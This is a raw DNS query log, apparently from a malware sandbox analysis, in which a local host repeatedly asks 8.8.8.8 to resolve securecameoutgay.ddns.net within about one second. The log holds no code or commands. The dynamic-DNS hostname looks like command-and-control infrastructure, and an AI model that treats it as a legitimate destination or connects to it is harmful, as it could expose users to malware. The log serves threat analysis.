                                                    Oct 12, 2024 23:05:39.350419044 CEST192.168.2.148.8.8.80x824Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.357186079 CEST192.168.2.148.8.8.80x824Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.364173889 CEST192.168.2.148.8.8.80x824Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.371177912 CEST192.168.2.148.8.8.80x824Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.378185987 CEST192.168.2.148.8.8.80xa15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.385119915 CEST192.168.2.148.8.8.80xa15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.392226934 CEST192.168.2.148.8.8.80xa15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.399013996 CEST192.168.2.148.8.8.80xa15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.405775070 CEST192.168.2.148.8.8.80xa15dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.412758112 CEST192.168.2.148.8.8.80xc624Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.419307947 CEST192.168.2.148.8.8.80xc624Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.425896883 CEST192.168.2.148.8.8.80xc624Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.432357073 CEST192.168.2.148.8.8.80xc624Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.439198017 CEST192.168.2.148.8.8.80xc624Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.446007967 CEST192.168.2.148.8.8.80x65c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.452565908 CEST192.168.2.148.8.8.80x65c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.458952904 CEST192.168.2.148.8.8.80x65c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.465827942 CEST192.168.2.148.8.8.80x65c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.472336054 CEST192.168.2.148.8.8.80x65c7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.478985071 CEST192.168.2.148.8.8.80x2f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.485523939 CEST192.168.2.148.8.8.80x2f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.492332935 CEST192.168.2.148.8.8.80x2f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.498857021 CEST192.168.2.148.8.8.80x2f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.505573988 CEST192.168.2.148.8.8.80x2f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.512290955 CEST192.168.2.148.8.8.80xeeceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.519030094 CEST192.168.2.148.8.8.80xeeceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.525535107 CEST192.168.2.148.8.8.80xeeceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.532078981 CEST192.168.2.148.8.8.80xeeceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.538779974 CEST192.168.2.148.8.8.80xeeceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.545686960 CEST192.168.2.148.8.8.80x5a60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.552057028 CEST192.168.2.148.8.8.80x5a60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.558562040 CEST192.168.2.148.8.8.80x5a60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.565113068 CEST192.168.2.148.8.8.80x5a60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.571439028 CEST192.168.2.148.8.8.80x5a60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.578219891 CEST192.168.2.148.8.8.80xcf33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.585000038 CEST192.168.2.148.8.8.80xcf33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.591425896 CEST192.168.2.148.8.8.80xcf33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.598946095 CEST192.168.2.148.8.8.80xcf33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.605479956 CEST192.168.2.148.8.8.80xcf33Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.612195969 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.618709087 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.625478029 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.632286072 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.639280081 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.646581888 CEST192.168.2.148.8.8.80xb8d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.653247118 CEST192.168.2.148.8.8.80xb8d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.659689903 CEST192.168.2.148.8.8.80xb8d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.666703939 CEST192.168.2.148.8.8.80xb8d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.673615932 CEST192.168.2.148.8.8.80xb8d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.680418968 CEST192.168.2.148.8.8.80xa031Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.686949015 CEST192.168.2.148.8.8.80xa031Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.693609953 CEST192.168.2.148.8.8.80xa031Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.700287104 CEST192.168.2.148.8.8.80xa031Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.707140923 CEST192.168.2.148.8.8.80xa031Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.716265917 CEST192.168.2.148.8.8.80x19adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.724505901 CEST192.168.2.148.8.8.80x19adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.734143972 CEST192.168.2.148.8.8.80x19adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.742429018 CEST192.168.2.148.8.8.80x19adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.749156952 CEST192.168.2.148.8.8.80x19adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.756632090 CEST192.168.2.148.8.8.80x6d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.765189886 CEST192.168.2.148.8.8.80x6d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.773618937 CEST192.168.2.148.8.8.80x6d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.782026052 CEST192.168.2.148.8.8.80x6d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.790628910 CEST192.168.2.148.8.8.80x6d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.799113989 CEST192.168.2.148.8.8.80x56c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.807667971 CEST192.168.2.148.8.8.80x56c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.815942049 CEST192.168.2.148.8.8.80x56c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.824400902 CEST192.168.2.148.8.8.80x56c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.833415985 CEST192.168.2.148.8.8.80x56c9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.840692997 CEST192.168.2.148.8.8.80x7a4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.849136114 CEST192.168.2.148.8.8.80x7a4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.856749058 CEST192.168.2.148.8.8.80x7a4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.863363981 CEST192.168.2.148.8.8.80x7a4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.872729063 CEST192.168.2.148.8.8.80x7a4eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.884269953 CEST192.168.2.148.8.8.80x1de3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.892541885 CEST192.168.2.148.8.8.80x1de3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.900939941 CEST192.168.2.148.8.8.80x1de3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.909454107 CEST192.168.2.148.8.8.80x1de3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.917583942 CEST192.168.2.148.8.8.80x1de3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.925729990 CEST192.168.2.148.8.8.80x2d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.933825970 CEST192.168.2.148.8.8.80x2d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.940326929 CEST192.168.2.148.8.8.80x2d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.946868896 CEST192.168.2.148.8.8.80x2d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.953449011 CEST192.168.2.148.8.8.80x2d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.959887028 CEST192.168.2.148.8.8.80xc5b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.966351032 CEST192.168.2.148.8.8.80xc5b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.972793102 CEST192.168.2.148.8.8.80xc5b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.979121923 CEST192.168.2.148.8.8.80xc5b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.985590935 CEST192.168.2.148.8.8.80xc5b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.992407084 CEST192.168.2.148.8.8.80x769bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:39.999401093 CEST192.168.2.148.8.8.80x769bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.006165981 CEST192.168.2.148.8.8.80x769bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.013008118 CEST192.168.2.148.8.8.80x769bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.019949913 CEST192.168.2.148.8.8.80x769bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.026767969 CEST192.168.2.148.8.8.80x4887Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.033160925 CEST192.168.2.148.8.8.80x4887Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.039737940 CEST192.168.2.148.8.8.80x4887Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.046044111 CEST192.168.2.148.8.8.80x4887Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.052421093 CEST192.168.2.148.8.8.80x4887Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.059365034 CEST192.168.2.148.8.8.80x2166Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.065848112 CEST192.168.2.148.8.8.80x2166Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.072664022 CEST192.168.2.148.8.8.80x2166Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.079325914 CEST192.168.2.148.8.8.80x2166Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.086189985 CEST192.168.2.148.8.8.80x2166Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.093226910 CEST192.168.2.148.8.8.80x6155Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.100533962 CEST192.168.2.148.8.8.80x6155Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.107487917 CEST192.168.2.148.8.8.80x6155Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.114094973 CEST192.168.2.148.8.8.80x6155Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.120533943 CEST192.168.2.148.8.8.80x6155Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.127068043 CEST192.168.2.148.8.8.80x8929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.133971930 CEST192.168.2.148.8.8.80x8929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.140711069 CEST192.168.2.148.8.8.80x8929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.147304058 CEST192.168.2.148.8.8.80x8929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.153754950 CEST192.168.2.148.8.8.80x8929Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.160197020 CEST192.168.2.148.8.8.80x9f3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.166596889 CEST192.168.2.148.8.8.80x9f3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.173109055 CEST192.168.2.148.8.8.80x9f3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.179539919 CEST192.168.2.148.8.8.80x9f3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.186151028 CEST192.168.2.148.8.8.80x9f3cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.192889929 CEST192.168.2.148.8.8.80xf4a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.199781895 CEST192.168.2.148.8.8.80xf4a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.206671953 CEST192.168.2.148.8.8.80xf4a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.213454008 CEST192.168.2.148.8.8.80xf4a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.220204115 CEST192.168.2.148.8.8.80xf4a5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.226737976 CEST192.168.2.148.8.8.80x7c1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.233397007 CEST192.168.2.148.8.8.80x7c1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.241154909 CEST192.168.2.148.8.8.80x7c1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.248492956 CEST192.168.2.148.8.8.80x7c1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.255702972 CEST192.168.2.148.8.8.80x7c1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.262581110 CEST192.168.2.148.8.8.80x6ddcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.269459009 CEST192.168.2.148.8.8.80x6ddcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.276031017 CEST192.168.2.148.8.8.80x6ddcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.282779932 CEST192.168.2.148.8.8.80x6ddcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.289535046 CEST192.168.2.148.8.8.80x6ddcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.296369076 CEST192.168.2.148.8.8.80x796aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.303157091 CEST192.168.2.148.8.8.80x796aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.309617996 CEST192.168.2.148.8.8.80x796aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.316437006 CEST192.168.2.148.8.8.80x796aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.323141098 CEST192.168.2.148.8.8.80x796aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.329595089 CEST192.168.2.148.8.8.80xcc72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.335946083 CEST192.168.2.148.8.8.80xcc72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.342432022 CEST192.168.2.148.8.8.80xcc72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.348975897 CEST192.168.2.148.8.8.80xcc72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.355870962 CEST192.168.2.148.8.8.80xcc72Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.362771988 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.369395018 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.376106977 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.382883072 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.389820099 CEST192.168.2.148.8.8.80xdfdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.396825075 CEST192.168.2.148.8.8.80xcfe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.403594971 CEST192.168.2.148.8.8.80xcfe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.410144091 CEST192.168.2.148.8.8.80xcfe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.417246103 CEST192.168.2.148.8.8.80xcfe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.424097061 CEST192.168.2.148.8.8.80xcfe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.431004047 CEST192.168.2.148.8.8.80xdfbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.437856913 CEST192.168.2.148.8.8.80xdfbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.445013046 CEST192.168.2.148.8.8.80xdfbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.453051090 CEST192.168.2.148.8.8.80xdfbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.460155010 CEST192.168.2.148.8.8.80xdfbfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.466655970 CEST192.168.2.148.8.8.80x71cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.473193884 CEST192.168.2.148.8.8.80x71cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.480892897 CEST192.168.2.148.8.8.80x71cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.489391088 CEST192.168.2.148.8.8.80x71cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.496608973 CEST192.168.2.148.8.8.80x71cfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.503350019 CEST192.168.2.148.8.8.80xedd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.510171890 CEST192.168.2.148.8.8.80xedd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.516735077 CEST192.168.2.148.8.8.80xedd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.523380041 CEST192.168.2.148.8.8.80xedd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.530504942 CEST192.168.2.148.8.8.80xedd8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.537439108 CEST192.168.2.148.8.8.80x20d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.543760061 CEST192.168.2.148.8.8.80x20d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.550486088 CEST192.168.2.148.8.8.80x20d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.557065964 CEST192.168.2.148.8.8.80x20d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.563646078 CEST192.168.2.148.8.8.80x20d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.570789099 CEST192.168.2.148.8.8.80x2a18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.577761889 CEST192.168.2.148.8.8.80x2a18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.584757090 CEST192.168.2.148.8.8.80x2a18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.592072010 CEST192.168.2.148.8.8.80x2a18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.605035067 CEST192.168.2.148.8.8.80x2a18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.612936020 CEST192.168.2.148.8.8.80x9cc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.619990110 CEST192.168.2.148.8.8.80x9cc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.627063036 CEST192.168.2.148.8.8.80x9cc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.633630991 CEST192.168.2.148.8.8.80x9cc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.641637087 CEST192.168.2.148.8.8.80x9cc7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.648593903 CEST192.168.2.148.8.8.80x5059Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.655656099 CEST192.168.2.148.8.8.80x5059Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:40.662472010 CEST192.168.2.148.8.8.80x5059Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
